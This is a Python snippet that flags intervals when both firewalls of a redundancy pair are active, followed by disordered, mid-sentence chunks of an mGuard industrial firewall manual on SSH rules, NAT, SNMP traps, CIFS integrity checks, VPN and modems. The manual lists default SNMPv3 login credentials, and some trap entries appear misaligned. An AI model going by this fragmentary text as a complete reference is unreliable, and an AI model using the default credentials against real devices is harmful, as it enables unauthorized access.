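"""Detect a network lobotomy (both members of a redundancy pair active) from state snapshots.

Added example, not mGuard code. State names follow the manual's redundancy status table.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

ACTIVE_STATES = {"active", "active_waiting"}
STANDBY_STATES = {"on_standby", "on_standby_waiting", "becomes_standby"}
OTHER_STATES = {"faulty", "faulty_waiting", "outdated", "outdated_waiting", "becomes_active"}
VALID_STATES = ACTIVE_STATES | STANDBY_STATES | OTHER_STATES


@dataclass(frozen=True)
class Snapshot:
    t: int        # seconds since start of the constructed log
    device: str   # "primary" or "secondary" (assumed names)
    state: str    # machine-readable redundancy state


def lobotomy_intervals(snapshots: Iterable[Snapshot],
                       devices: Tuple[str, ...] = ("primary", "secondary")) -> List[Tuple[int, Optional[int]]]:
    """Intervals [(start, end)] during which every device reported an active state.
    end is None if the condition is still present at the end of the log."""
    current: Dict[str, Optional[str]] = {d: None for d in devices}
    intervals: List[Tuple[int, Optional[int]]] = []
    open_start: Optional[int] = None
    for s in sorted(snapshots, key=lambda s: s.t):
        if s.state not in VALID_STATES:
            raise ValueError(f"unknown redundancy state {s.state!r} at t={s.t}")
        if s.device not in current:
            continue
        current[s.device] = s.state
        both_active = all(st in ACTIVE_STATES for st in current.values())
        if both_active and open_start is None:
            open_start = s.t
        elif not both_active and open_start is not None:
            intervals.append((open_start, s.t))
            open_start = None
    if open_start is not None:
        intervals.append((open_start, None))
    return intervals


def active_after_recovery(priorities: Dict[str, int]) -> Optional[str]:
    """Rule from the manual: the higher priority becomes active; on a tie the CARP
    identifier decides, which this function cannot know, so it returns None."""
    ranked = sorted(priorities.items(), key=lambda kv: kv[1], reverse=True)
    if len(ranked) > 1 and ranked[0][1] == ranked[1][1]:
        return None
    return ranked[0][0]


# Constructed log: the link between the pair fails at t=30, the secondary promotes
# itself, both run active until the link returns at t=120. At t=200 the primary
# fails outright and the secondary takes over normally (no lobotomy).
SAMPLE_LOG = [
    Snapshot(0, "primary", "active"),
    Snapshot(0, "secondary", "on_standby"),
    Snapshot(30, "secondary", "becomes_active"),
    Snapshot(35, "secondary", "active"),
    Snapshot(60, "primary", "active_waiting"),
    Snapshot(120, "secondary", "on_standby"),
    Snapshot(200, "primary", "faulty"),
    Snapshot(201, "secondary", "becomes_active"),
    Snapshot(205, "secondary", "active"),
]


def demo() -> dict:
    return {
        "lobotomies": lobotomy_intervals(SAMPLE_LOG),
        "winner_by_priority": active_after_recovery({"primary": 100, "secondary": 50}),
        "winner_on_tie": active_after_recovery({"primary": 100, "secondary": 100}),
    }


if __name__ == "__main__":
    print(demo())
```

An interval in the result means connections set up through the device that later lost the election were dropped, which is the symptom operators see after the link is repaired; alerting on the interval rather than on the individual state changes keeps the signal actionable.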
337. of the list of entries until an appropriate rule is found. This rule is then applied. If the list of rules contains further subsequent rules that could also apply, these rules are ignored. The rules specified here only take effect if Enable SSH remote access is set to Yes. Internal access is also possible when this option is set to No. A firewall rule that would refuse internal access does therefore not apply in this case. The following options are available: From IP: enter the address of the computer or network from which remote access is permitted or forbidden in this field. The following options are available: IP address; 0.0.0.0/0 means all addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). Interface: External, Internal, External 2, VPN, Dial-in. External 2 and Dial-in are only for devices with a serial interface (see Network >> Interfaces on page 105). Specifies to which interface the rule should apply. If no rules are set, or if no rule applies, the following default settings apply: SSH access is permitted via Internal, VPN and Dial-in; access via External and External 2 is refused. Specify the access options according to your requirements. NOTE: if you want to refuse access via Internal, VPN or Dial-in, you must implement this explicitly by means of corresponding firewall rules, for example by specifying Drop as an action. To pre
338. of the mGuard is deactivated and data traffic is transferred to and from the WAN via the externally accessible serial interface (serial port) of the mGuard. An external modem which establishes the connection to the telephone network is connected to the serial port. The connection to the WAN or Internet is then established via the telephone network by means of the external modem. If the address of the mGuard is changed (e.g. by changing the network mode from Stealth to Router), the device can only be accessed via the new address. If the configuration is changed via the LAN port, confirmation of the new address is displayed before the change is applied. If configuration changes are made via the WAN port, no confirmation is displayed. If the mode is set to Router, PPPoE or PPTP and you then change the IP address of the LAN port and/or the local subnet mask, make sure you specify the correct values. Otherwise the mGuard may no longer be accessible under certain circumstances. For the further configuration of Built-in mobile network modem / Built-in Modem / Modem network mode, see Router network mode (Modem router mode) on page 129. Router Mode: Built-in Modem. Only used for mGuard industrial rs devices with a built-in modem or ISDN terminal adapter. If Built-in modem network mode is selected, the external Ethernet interface of the mGuard is deactivated and data is transferred to and from the WAN via the built-in modem or b
339. of the mobile network connection. To do so, you need to set the GSM_DEBUG variable to yes via the console or SNMP. 6.7.1 General. [Screenshot: Network >> Mobile Network >> General (tabs: General, SIM Settings, Text message Notifications, Positioning system), showing Mobile network state (power state of the mobile network, positioning engine, signal level, Local Area Code and Cell ID of the base station, PLMN, Radio Access Technology, PPP connection), Provider (current provider, provider selection), Radio Settings (GSM, 3G/UMTS and CDMA frequencies), Connection Supervision (daily relogin and time) and Mobile Network Supervision (probe status, probe targets with ICMP Ping, probe interval in minutes, number of times all probes need to fail before the mobile network connection is considered stalled).] Network >> Mobile Network >> General: Mobile network state; Power state of the mobile network; Positioning engine; Signal strength; Local Area Code and Cell ID of the base station; Radio Access Technology; PPP connection; Provid
340. ofile created under a newer firmware version should not be loaded and will be rejected. Encrypted configuration memory: in the case of platform 2 mGuard and firmware 7.6.1 or later, the configuration storage (ECS) and configuration profile (ATV) can be encrypted. This makes the rollout easier. You can save several mGuard configurations on an SD card and then use it to start up all mGuards. During the startup process, the mGuard finds the valid configurations on the SD card. This is loaded, decrypted and used as a valid configuration (see Encrypt the data on the ECS on page 77). Management >> Configuration Profiles. [Screenshot: Configuration Profiles page with the Save Current Configuration to Profile section.] At the top of the page there is a list of the configuration profiles that are stored on the mGuard, e.g. the Factory Default configuration profile. If any configuration profiles have been saved by the user (see below), they will be listed here. Active configuration profile: the configuration profile that is currently enabled has an Active symbol at the start of the entry. Configuration profiles that are stored on the mGuard can be: enabled; saved as a file on the connected configuration computer; deleted; displayed. Displaying the configuration profile: click on the name of the configuration profile in the list. Enabling the factory default or a confi
341. ol to which the rule should apply: TCP, UDP, GRE. GRE: GRE protocol IP packets can be forwarded. However, only one GRE connection is supported at any given time. If more than one device sends GRE packets to the same external IP address, the mGuard may not be able to feed back reply packets correctly. We recommend only forwarding GRE packets from specific transmitters. These could be ones that have had a forwarding rule set up for their source address by entering the transmitter address in the From IP field, e.g. 193.194.195.196/32. From IP: the sender address for forwarding. 0.0.0.0/0 means all addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). From Port: the sender port for forwarding. any refers to any port. Either the port number or the corresponding service name can be specified here, e.g. pop3 for port 110 or http for port 80. Network >> NAT >> IP and Port Forwarding. Incoming on IP: specify the external IP address or one of the external IP addresses of the mGuard here, or use the variable %extern if the external IP address of the mGuard is changed dynamically so that the external IP address cannot be specified. If multiple static IP addresses are used for the WAN port, the %extern variable always refers to the first IP address in the list. Incoming on Port: The ori
342. ollowing intentional manipulation of the relevant files of the network drive. Unauthorized manipulation of the relevant files cannot be detected if there is no valid integrity database. 9.2.1 Settings. CIFS Integrity Monitoring menu. [Screenshot: CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings, with the General section (Integrity certificate used to sign integrity databases; Send notifications via e-mail; Target address for e-mail notifications; Subject prefix for e-mail notifications) and the Checking of Shares table (share, check enabled, mount state, differences found during last check, Edit).] CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings, General: Integrity certificate (used to sign integrity databases): used for signing and checking the integrity database so that it cannot be replaced or manipulated by an intruder without being detected. For information about certificates, please refer to Machine Certificates on page 197. Send notifications via e-mail; E-mail address for notifications; Start of the subject for e-mail notifications. After every check: an e-mail is sent to the address specified below after every check
343. VPN (Virtual Private Network), Glossary: a Virtual Private Network (VPN) connects several separate private networks (subnetworks) via a public network, e.g. the Internet, to form a single common network. A cryptographic protocol is used to ensure confidentiality and authenticity. A VPN is therefore an inexpensive alternative to using permanent lines for building a nationwide company network.
344. ols. any refers to any port. startport:endport (e.g. 110:120) refers to a port area. Individual ports can be specified using the port number or the corresponding service name, e.g. 110 for pop3 or pop3 for 110. Accept means that the data packets may pass through. Reject means that the data packets are sent back and the sender is informed of their rejection. (In Stealth mode, Reject has the same effect as Drop.) Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not informed of their whereabouts. Name of rule sets (if defined): when a name is specified for rule sets, the firewall rules saved under this name take effect (see Rule Records tab page). Freely selectable comment for this rule. For each individual firewall rule you can specify whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, default setting). When set to Yes, all connection attempts that are not covered by the rules defined above are logged. Default setting: No. 8.1.4 Rule Records. [Screenshot: Network Security >> Packet Filter, Rule Records tab, listing rule records with their Active state and name.] Network Security >> Packet Filter >> Rule Records. Rule Records: Initial Mo
345. omain / workgroup; NetBIOS name (Windows 95/98 only); Login; Password. Name of the network drive to be checked: internal name used in the configuration. IP address of the server whose network drive is to be checked. Directory on the above authorized server that is to be checked. Name of the workgroup to which the network drive belongs. NetBIOS name for Windows 95/98 computers. Login for the server. Password for login. 9.2 CIFS Integrity Monitoring >> CIFS Integrity Checking. When CIFS integrity checking is performed, the Windows network drives are checked to determine whether certain files (e.g. .exe, .dll) have been changed. Changes to these files indicate a possible virus or unauthorized intervention. Integrity database: if a network drive that is to be checked is reconfigured, an integrity database must be created. This integrity database is used as the basis for comparison when checking the network drive regularly. The checksums of all files to be monitored are recorded here. The integrity database is protected against manipulation. The database is either created explicitly due to a specific reason (see CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit >> Management, Possible Actions) or on the first regular check of the drive. The integrity database must be created again f
346. If SNMPv3 or SNMPv1/v2 is activated, this is indicated by a green signal field on the tab at the top of the page. Otherwise, i.e. if SNMPv3 or SNMPv1/v2 is not active, the signal field is red. Processing an SNMP request may take more than one second. However, this value corresponds to the default timeout value of some SNMP management applications. If you experience timeout problems, set the timeout value of your management application to values between 3 and 5 seconds. Management >> SNMP >> Query. Settings: Enable SNMPv3 access (Yes/No): if you wish to allow monitoring of the mGuard via SNMPv3, set this option to Yes. The firewall rules for the available interfaces must be defined on this page under Allowed Networks in order to specify differentiated access and monitoring options on the mGuard. Access via SNMPv3 requires authentication with a login and password. The default settings for the login parameters are: Login: admin; Password: SnmpAdmin (please note that the password is case-sensitive). MD5 is supported for the authentication process. DES is supported for encryption. The login parameters for SNMPv3 can only be changed using SNMPv3. Enable SNMPv1/v2 access (Yes/No): if you wish to allow monitoring of the mGuard via SNMPv1/v2, set this option to Yes. You must also enter the login data under SNMPv1/v2 Community. The firewall rules for the avail
347. on must be in place, otherwise the connectivity check will fail. ICMP echo requests can also be sent (optional). The ICMP echo requests can be set using the Redundancy >> Firewall Redundancy >> Connectivity Checks menu. Availability check: on each mGuard in a redundant pair, checks are also constantly performed to determine whether an active mGuard is available and whether it should remain active. A variation of CARP (Common Address Redundancy Protocol) is used here. The active mGuard constantly sends presence notifications through its internal and external network interface, while both mGuard devices listen. If a dedicated Ethernet link for state synchronization of the firewall is available, the presence notification is also sent via this link. In this case, the presence notification for the external network interface can also be suppressed. The availability check fails if an mGuard does not receive any presence notifications within a certain time. The check also fails if an mGuard receives presence notifications with a lower priority than its own. The data is always transmitted through the physical network interface and never through the virtual network interface. Redundancy. State synchronization: the mGuard on standby receives a copy of the state of the mGuard that is currently active. This includes a database containing the forwarded network connections. This databas
348. onfiguration of SSH (Management >> System Settings, Shell Access menu), HTTPS (Management >> Web Settings, Access menu) and VPN connections (IPsec VPN >> Connections menu), the certificates imported on the mGuard are provided in a selection list. The certificates are displayed under the short name specified for each certificate in this selection list. Name assignment is mandatory. Creating a certificate copy: a copy can be created from the imported CA certificate. To do this, proceed as follows: click on Current Certificate File next to the Download Certificate row for the relevant CA certificate. A dialog box opens in which you can enter the required information. Authentication menu. 7.4.4 Remote Certificates. A remote certificate is a copy of the certificate that is used by a partner to authenticate itself to the mGuard. Remote certificates are files (file name extension .cer, .pem or .crt) received from possible partners by trustworthy means. You load these files on the mGuard so that reciprocal authentication can take place. The remote certificates of several possible partners can be loaded. The remote certificate for authentication of a VPN connection or the channels of a VPN connection is installed in the IPsec VPN >> Connections menu. For a more detailed explanation, see Authentication >> Certificates on page 190. Ex
349. onfiguration permits this. As in Router network mode, VPN data traffic can flow to and from the locally connected computers. Because this traffic is encrypted by the mGuard, it is seen as being generated by the mGuard. In Router network mode: all data traffic, i.e. from and to locally connected computers or generated by the mGuard, can be routed to the external network (WAN) via the secondary external interface. [Screenshot: Secondary External Interface, Network Mode set to Off.] Network Mode: Off, Modem, Built-in mobile network modem. Off (default): select this setting if the operating environment of the mGuard does not require a secondary external interface. You can then use the serial interface or the built-in modem (if present) for other purposes (see Modem/Console on page 139). Modem / Built-in Modem: if you select one of these options, the secondary external interface will be used to route data traffic permanently or temporarily to the external network (WAN). The secondary external interface is created via the serial interface of the mGuard and an external modem connected to it. Built-in mobile network modem: Firmware 5.2 or later supports an external or internal modem as a fallback for the external interface. From Version 8.0 this also includes the internal mobile network modem of the mGuard rs4000 3G. The modem can be used permanently as the secondary external interface. In the event of a network error, it can also be used t
350. or each setting is listed below. A more detailed description can be found in the MIB that belongs to the mGuard. (...) must be located in the network that is specified as the Remote network in the definition of the VPN connection. If SNMP traps are sent to the partner via a VPN channel: the IP address of the partner; the internal IP address must be located in the network that is specified as Local in the definition of the VPN connection (see IPsec VPN >> Connections >> Edit >> General). If the IPsec VPN >> Connections >> Edit >> General, Local option is set to 1:1 NAT (see page 263), the following applies: the internal IP address must be located in the specified local network. If the IPsec VPN >> Connections >> Edit >> General, Remote option is set to 1:1 NAT (see page 265), the following applies: the IP address of the SysLog server must be located in the network that is specified as Remote in the definition of the VPN connection. Management >> SNMP >> Trap. Basic traps: SNMP authentication; Link Up/Down; Coldstart; Admin access (SSH, HTTPS); new DHCP client. Activate traps (Yes/No). enterprise-oid: mGuardinfo; generic-trap: authenticationFailure; specific-trap: 0. Sent if an unauthorized station attempts to access the mGuard SNMP agent. Acti
351. ord. Management menu. The mGuard rs4000/rs2000 3G and the mGuard industrial rs devices have connections to which external buttons or an on/off switch and actuators (e.g. a signal lamp) can be connected. One of the configured VPN connections can be established and disconnected via the button or on/off switch. The VPN connection is specified here. The display shows the VPN connections that have been set up under IPsec VPN >> Connections >> Edit >> General. For the input to be active, the service input must be selected under Controlling service input in the IPsec VPN >> Connections >> Edit >> General menu. The display shows the firewall rule records that have been set up under Network Security >> Packet Filter >> Rule Records. Off / VPN connections / Rule Records: the state of the selected VPN connection or the selected firewall rule record is indicated via the associated signal contact (ACK output). 4.7.2 Alarm output. [Screenshot: Management >> Service I/O >> Alarm output, General section: Operation mode (Manual setting), Manual setting (Closed), Current state (Alarm output closed, high, OK, No alarm), Redundant power supply (Ignore), Link supervision (Ignore), Temperature condition (Ignore), Connection state of the internal modem (Ignore).] Management >> Service I/O >> Alarm output, General: O
352. orithm has (specified by the appended number), the more secure it is. The relatively new AES-256 method is therefore the most secure; however, it is still not used that widely. The longer the key, the more time-consuming the encryption procedure. However, this does not affect the mGuard, as it uses a hardware-based encryption technique. Nevertheless, this aspect may be of significance for the partner. The algorithm designated as Null does not contain encryption. Hash: leave this set to All algorithms. It then does not matter whether the partner is operating with MD5, SHA-1, SHA-256, SHA-384 or SHA-512. The SHA-256 and SHA-512 algorithms are supported by all mGuard devices. However, not all mGuard devices accelerate the algorithms via hardware. The mGuard centerport supports them and does not require hardware acceleration. Only the mGuard smart also accelerates SHA-256 via hardware. On the other mGuard devices, MD5 and SHA-1 are accelerated with hardware. Diffie-Hellman: the Diffie-Hellman key exchange method is not available for all the algorithms. The bit depth for the encryption can be set here. IPsec SA (Data Exchange): in contrast to ISAKMP SA (key exchange, see above), the procedure for data exchange is defined here. It does not necessarily have to differ from the procedure defined for key exchange. Algorithms: see above. IPsec VPN menu. IPsec VPN >
353. ormation. The mGuard incorporates certain free and open software. Some license terms associated with this software require that Innominate Security Technologies AG provides copyright and license information (see below for details). All the other components of the mGuard Firmware are Copyright 2001-2010 by Innominate Security Technologies AG. Last reviewed on 2011-05-11 for the mGuard 7.4.0 release. License list: atv (BSD-style); bcron (GNU GPLv2); bglibs (GNU GPLv2); bridge-utils (GNU GPLv2); busybox (GNU GPLv2, MIT-derivate license); c-ares (BSD-style and GNU GPLv2); djbdns (Copyright 2001 D. J. Bernstein); conntrack (GNU GPLv2); curl (MIT-derivate license); ebtables (GNU GPLv2); EXT2 filesystem utilities (GNU GPLv2; lib/ext2fs LGPLv2; e2fsprogs lib/e2p LGPLv2; lib/uuid BSD-style); ez-ipupdate (GNU GPLv2); fnord (GNU GPLv2); GNU GPLv2/LGPLv2; md2 (derived from the RSA Data Security, Inc. MD2 Message-Digest Algorithm); md5 (derived from the RSA Data Security, Inc. MD5 Message-Digest Algorithm); libdes (BSD-style); libcrypto (BSD-style); Eric Young (BSD-style); OpenSSL; libaes (BSD-style); zlib (zlib license); raij (BSD-style); FreeS/WAN, Openswan. Lists the licenses of the external software used on the mGuard. The software is usually open source software. 4.3.4 Management >> Update. With mGuard firmware Version 5.0.0 or later, a license must be obtained for the relevant
354. ossible the VPN gateway of the partner is causing problems. In this case, deactivate and reactivate the connection to reestablish the connection. 11 SEC Stick menu. The mGuard supports the use of an SEC Stick, which is an access protector for IT systems. The SEC Stick is a product of the team2work company (www.team2work.de). The SEC Stick is a key. The user inserts it into the USB port of a computer with an Internet connection and can then set up an encrypted connection to the mGuard in order to securely access defined services in the office or home network. The Remote Desktop Protocol, for example, can be used within the encrypted and secure SEC Stick connection to control a PC remotely in the office or at home, as if the user was sitting directly in front of it. In order for this to work, access to the business PC is protected by the mGuard, and the mGuard must be configured for the SEC Stick to permit access, because the user of the remote computer into which the SEC Stick is inserted authenticates herself/himself to the mGuard using the data and software stored on her/his SEC Stick. The SEC Stick establishes an SSH connection to the mGuard. Additional channels can be embedded into this connection, e.g. TCP/IP connections. 11.1 Global. SEC Stick >> Global, Access: Enable SEC Stick service; Enable SEC Stick r
355. ote IP 0.0.0.0; Netmask 0.0.0.0. Network >> Interfaces >> Dial-out. PPP dial-out options (this menu item is not included in the scope of functions for the mGuard rs2000 3G / mGuard rs2000): these settings are only necessary when the mGuard is to establish a data link to the WAN/Internet via one of these interfaces: via the primary external interface (Modem or Built-in mobile network modem network mode), or via the secondary external interface (also available in Stealth or Router network mode). Phone number to call: phone number of the Internet service provider. The connection to the Internet is established after establishing the telephone connection. Command syntax: together with the previously set ATD modem command for dialing, the following dial sequence, for example, is created for the connected modem: ATD76543z2. A compatible pulse dialing procedure that works in all scenarios is used as standard. Special dial characters can be used in the dial sequence. Network menu. Network >> Interfaces >> Dial-out. HAYES special dial characters: W instructs the modem to insert a dialing pause at this point until the dial tone can be heard. Used when the modem is connected to a private branch exchange: an external line must be obtained first for outgoing calls by dialing a specific number (e.g. 0) before the phone number of the relevant s
356. out a license until further notice. Management >> Update. Local Update, Filename: to install the packages, proceed as follows: click on Browse, select the file and open it so that the file name or path is displayed in the Filename field. The file name must have the following format: update-a.b.c-d.e.f.default.<platform>.tar.gz. Example: update-7.0.0-7.0.1.default.ixp4xx_be.tar.gz. Then click on Install Packages. Online Update, Package set name: to perform an online update, proceed as follows: make sure that there is at least one valid entry under Update Servers. You should have received the necessary details from your licenser. Enter the name of the package set, e.g. update-6.1.x-7.2.0. Then click on Install Package Set. Automatic Update: this is a version of the online update where the mGuard independently determines the required package set. Install the latest patch release (x.y.Z): patch releases resolve errors in previous versions and have a version number which only changes in the third digit position. For example, 4.0.1 is a patch release for Version 4.0.0. Install the latest minor release (x.Y.z) for the currently installed major version / Install the next major: minor and major releases supplement the mGuard with new properties or contain changes that affect the behavior of the mGuard. Their version number changes in the first or second digit position. For example, 4.1.0 is a major or mi
357. owing instructions assume that the certificates have already been correctly installed on the mGuard (see Authentication >> Certificates on page 190). If the use of revocation lists (CRL checking) is activated under the Authentication >> Certificates, Certificate settings menu item, each certificate signed by a CA that is shown by the HTTPS clients must be checked for revocations. Management >> Web Settings >> Access. CA certificate: this configuration is only necessary if the user access via HTTPS shows a certificate signed by a CA. All CA certificates required by the mGuard to form the chain to the relevant root CA certificate with the certificates shown by the user must be configured. If the browser of the remote user also provides CA certificates that contribute to forming the chain, then it is not necessary for these CA certificates to be installed on the mGuard and referenced at this point. However, the corresponding root CA certificate must be installed on the mGuard and made available (referenced) in any case. When selecting the CA certificates to be used, or when changing the selection or the filter settings, you must first select and test the Login with X.509 client certificate or password option as the User authentication method before enabling the new setting. Only switch to Login restr
358. pecific; specific-trap: mGuardTrapCIFSScanFailure (2); additional: mGuardTResCIFSShare, mGuardTResCIFSScanError, mGuardTResCIFSNumDiffs. This trap is sent if the CIFS integrity check has failed. Activate traps (Yes/No). enterprise-oid: mGuardTrapCIFSScan; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapCIFSScanDetection (3); additional: mGuardTResCIFSShare, mGuardTResCIFSScanError, mGuardTResCIFSNumDiffs. This trap is sent if the CIFS integrity check has detected a deviation. Activate traps (Yes/No). enterprise-oid: mGuardTrapUserFirewall; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapUserFirewallLogin (1); additional: mGuardTResUserFirewallUsername, mGuardTResUserFirewallSrcIP, mGuardTResUserFirewallAuthenticationMethod. This trap is sent when a user logs into the user firewall. Management >> SNMP >> Trap. VPN traps: IPsec connection status changes. enterprise-oid: mGuardTrapUserFirewall; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapUserFirewallLogout (2); additional: mGuardTResUserFirewallUsername, mGuardTResUserFirewallSrcIP, mGuardTResUserFirewallLogoutReason. This trap is sent when a user logs out of the user firewall. enterprise-oid: mGuardTrapUserFirewall; generic-trap: enterpriseS
359. pecific; specific-trap: mGuardTrapUserFirewallAuthError (TRAP-TYPE 3); additional: mGuardTResUserFirewallUsername, mGuardTResUserFirewallSrcIP, mGuardTResUserFirewallAuthenticationMethod. This trap is sent in the event of an authentication error. Activate traps (Yes/No). enterprise-oid: mGuardTrapVPN; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapVPNIKEServerStatus (1); additional: mGuardTResVPNStatus. This trap is sent when the IPsec IKE server is started or stopped. enterprise-oid: mGuardTrapVPN; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapVPNIPsecConnStatus (2); additional: mGuardTResVPNName, mGuardTResVPNIndex, mGuardTResVPNPeer, mGuardTResVPNStatus, mGuardTResVPNType, mGuardTResVPNLocal, mGuardTResVPNRemote. This trap is sent when the status of an IPsec connection changes. enterprise-oid: mGuard; generic-trap: enterpriseSpecific; specific-trap: mGuardTrapVPNIPsecConnStatus. This trap is sent when a connection is established or aborted. It is not sent when the mGuard is about to accept a connection request for this connection. Management >> SNMP >> Trap. L2TP connection status changes. Mobile network traps: incoming text message or voice call, and network supervision (this menu item is only included in the scope of functions for the mGuard rs4000 3G / mGuard rs2000 3G). Ma
360. pecified on the Authentication tab page (see Authentication on page 269). Same firewall settings. Same IKE options set. Started / Disabled / Stopped: the Disabled setting deletes the VPN connection. The other two settings determine the status of the VPN connection when restarting the connection or booting. With Version 8.0 or later, the VPN connections can be started or stopped via a button on the web interface, via text message or via the nph-vpn.cgi script. An IP address, host name or any (for several partners or partners downstream of a NAT router). Address of the remote site's VPN gateway: [Figure 10-2: the address of the transition to the private network where the remote communication partner is located (VPN gateway of the partner).] If the mGuard should actively initiate and establish the connection to the remote partner, specify the IP address or host name of the partner here. If the VPN gateway of the partner does not have a fixed and known IP address, the DynDNS service (see glossary) can be used to simulate a fixed and known address. If the mGuard should be ready to allow a connection to the local mGuard that was actively initiated and established by a remote partner with any IP address, specify any. This setting should also be selected for a VPN star configuration if the mGuard is con
361. peration mode: Operation supervision / Manual setting. The alarm output can be controlled automatically using Operation supervision (default) or Manual setting.
Manual setting: Closed / Open (Alarm). The desired state of the alarm output for function control can be selected here.
Current state: Displays the state of the alarm output.
Redundant power supply: Ignore / Supervise. Only available with the mGuard rs4000 or mGuard rs4000 3G. If set to Ignore, the state of the power supply does not influence the alarm output. If set to Supervise, the alarm output is opened if one of the two supply voltages fails.
Link supervision: Ignore / Supervise. Monitoring of the link status of the Ethernet connections. If set to Ignore, the link status of the Ethernet connections does not influence the alarm output. If set to Supervise, the alarm output is opened if one link does not indicate connectivity. Set the links to be monitored under Link supervision in the Network >> Ethernet >> MAU settings menu.
Temperature condition: The alarm output indicates overtemperature and undertemperature. The permissible range is set under System Temperature (°C) in the Management >> System Settings >> Host menu. If set to Ignore, the temperature does not influence the signal contact. If set to Supervise, the alarm output is opened if the temperature is not w
362. plies to the outgoing data packets, the firewall rules for Outgoing for this other connection definition are used.
IPsec VPN menu: If the mGuard has been configured to forward SSH connection packets (e.g. by permitting a SEC-Stick hub & spoke connection), existing VPN firewall rules are not applied. This means, for example, that packets of an SSH connection are sent via a VPN tunnel despite the fact that this is prohibited by its firewall rules.
IPsec VPN >> Connections >> Edit >> Firewall
Incoming, General firewall setting: Allow all incoming connections (the data packets of all incoming connections are allowed); Drop all incoming connections (the data packets of all incoming connections are discarded); Accept Ping only (the data packets of all incoming connections are discarded, except for ping packets (ICMP)); Use the firewall ruleset below (displays further setting options). This menu item is not included in the scope of functions for the mGuard rs2000 3G / mGuard rs2000.
The following settings are only visible if Use the firewall ruleset below is set.
Protocol: All means TCP, UDP, ICMP, GRE and other IP protocols.
From IP / To IP: 0.0.0.0/0 means all IP addresses. To specify an address area, use CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). Incoming: From IP is the IP address in the VPN tunnel; To IP th
363. r the number of incoming and outgoing ARP requests or replies allowed per second. These values are set to a level that can never be reached during normal practical operation. However, they can be easily reached in the event of attacks, thus providing additional protection. If there are special requirements in your operating environment, these values can be increased.
Network Security menu
8.3 Network Security >> User Firewall
This menu is not available on the mGuard rs2000 3G. The user firewall is used exclusively by firewall users, i.e. users that are registered as firewall users (see Authentication >> Firewall Users on page 185). Each firewall user can be assigned a set of firewall rules, also referred to as a template.
8.3.1 User Firewall Templates
[Screenshot: Network Security >> User Firewall >> User Firewall Templates table; example entry: enabled template BluePrint with Edit button.]
All defined user firewall templates are listed here. A template can consist of several firewall rules. A template can be assigned to several users.
Defining a new template:
- In the template table, click on Edit to the right of the unnamed entry under Name.
- If the unnamed entry cannot be seen, open another row in the table.
Editing a set of rules:
- Click on Edit to the right of the relevant entry.
Network Security >> User Firewall >> User Firewall Templates
Enabled: Activates/deactiva
364. rative Users menu (see page 181). The option of RADIUS authentication is also available (see page 187).
Depending on which user ID is used to log in (user or administrator password), the user has the right to operate and/or configure the mGuard accordingly.
Login with X.509 client certificate or password: User authentication is by means of login with a password (see above), or the user's browser authenticates itself using an X.509 certificate and a corresponding private key. Additional details must be specified below. The use of either method depends on the web browser of the remote user. The second option is used when the web browser provides the mGuard with a certificate.
Login restricted to X.509 client certificate: The user's browser must use an X.509 certificate and the corresponding private key to authenticate itself. Additional details must be specified here.
Before enabling the Login restricted to X.509 client certificate option, you must first select and test the Login with X.509 client certificate or password option. Only switch to Login restricted to X.509 client certificate when you are sure that this setting works. Otherwise your access could be blocked. Always take this precautionary measure when modifying settings under User authentication.
X.509 authentication for HTTPS: If the following User authentication meth
365. rd. Each cell contains multiple control elements, which can be addressed via their IP addresses. Different address areas are used for each cell. A service technician should be able to use her/his notebook on site to connect to the local network for machine A, B or C and to communicate with the individual controllers. So that the technician does not have to know and enter the IP address for every single controller in machine A, B or C, host names are assigned to the IP addresses of the controllers in accordance with a standardized diagram that the service technician uses. The host names used for machines A, B and C are identical, i.e. the controller for the packing machine in all three machines has the host name "pack", for example. However, each machine is assigned an individual domain name, e.g. cell-a.example.com. The service technician can connect her/his notebook to the local network at machine A, B or C and use the same host names in each of these networks to communicate with the corresponding machine controllers. The notebook can obtain the IP address to be used, the name server and the domain from the mGuard via DHCP.
[Figure: Notebook of service technician; IP addresses and host names with domain: Controller A 10.1.30.1/24, Controller B 10.1.30.2/24, Controller C 10.1.30.3/24; host names fold.cell-a.example.com, pack.cell-a.example.com, fill.cell-a.example.com; Switch, network 10.1.30.0/24; Controllers A, B, C in each cell.]
366. rding to X.509. The selection list contains the machine certificates that have been loaded on the mGuard under the Authentication >> Certificates menu item (see page 190).
SSH server certificate 2: Specifies how the mGuard authenticates the SSH client. The following definition relates to how the mGuard verifies the authenticity of the SSH client. The table below shows which certificates must be provided for the mGuard to authenticate the SSH client if the SSH client shows one of the following certificate types when a connection is established: a certificate signed by a CA, or a self-signed certificate. For additional information about the table, see Authentication >> Certificates.
Authentication for SSH:
The partner shows the following: (a) certificate specific to individual, signed by CA; (b) certificate specific to individual, self-signed.
The mGuard authenticates the partner using: for (a), all CA certificates that form the chain to the root CA certificate, together with the certificate shown by the partner, PLUS, if required, remote certificates if used as a filter; for (b), the remote certificate.
According to this table, the certificates that must be provided are the ones the mGuard uses to authenticate the relevant SSH client.
Management menu: The following instructions assume that the certificates have already been correctly installed on the mGuard
367. re then routed to the corresponding network via the secondary external interface in permanent or temporary mode.
Gateway: Specify the IP address (if known) of the gateway that is used for routing to the external network described above. When you dial into the Internet using the phone number of the Internet service provider, the address of the gateway is usually not known until you have dialed in. In this case, enter "gateway" in the field as a wildcard.
Network menu, Operation Mode (permanent / temporary): In both permanent and temporary operating mode, the modem must be available to the mGuard for the secondary external interface so that the mGuard can establish a connection to the WAN/Internet via the telephone network connected to the modem. Which data packets are routed via the primary external interface (Ethernet interface) and which data packets are routed via the secondary external interface is determined by the routing settings that are applied for these two external interfaces. Therefore, an interface can only take a data packet if the routing setting for that interface matches the destination of the data packet.
